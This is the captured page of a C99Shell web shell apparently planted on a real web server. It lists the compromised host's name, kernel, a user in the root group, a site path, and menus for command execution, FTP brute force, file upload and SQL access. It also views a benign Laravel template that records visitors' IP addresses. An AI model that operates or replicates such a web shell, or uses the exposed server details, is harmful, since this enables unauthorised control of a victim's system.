!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/resources/views/   drwxr-xr-x
Free 29.39 GB of 117.98 GB (24.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     fetch_ip.blade.php (1.32 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Get Network IP Address</title>
    <style>
        .loading-section img{
            margin-top: 10%;
        }
        .loading-section{
            text-align: center;
        }
    </style>
</head>
<body>

<div>
    <div class="loading-section">
        <img src="{{asset('images/lg.gif')}}" alt="">
    </div>
</div>


<form action="{{route('shorten.url.redirect',[$short_url_id])}}" id="fetchIpForm" style="display: none" method="post">
    @csrf
    @method('put')

    <input type="hidden" name="ip_address" id="ipAddress">
    <input type="hidden" name="contact_id" value="{{$contact_id}}">

</form>

<script>
    // Function to fetch IP address from an external API
    function fetchIPAddress() {
        fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                document.getElementById('ipAddress').value  = data.ip;
                document.getElementById("fetchIpForm").submit();

            })
            .catch(error => {
                location.href='{{route('home')}}'
            });
    }

    // Call the function when the page loads
    window.onload = fetchIPAddress;
</script>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--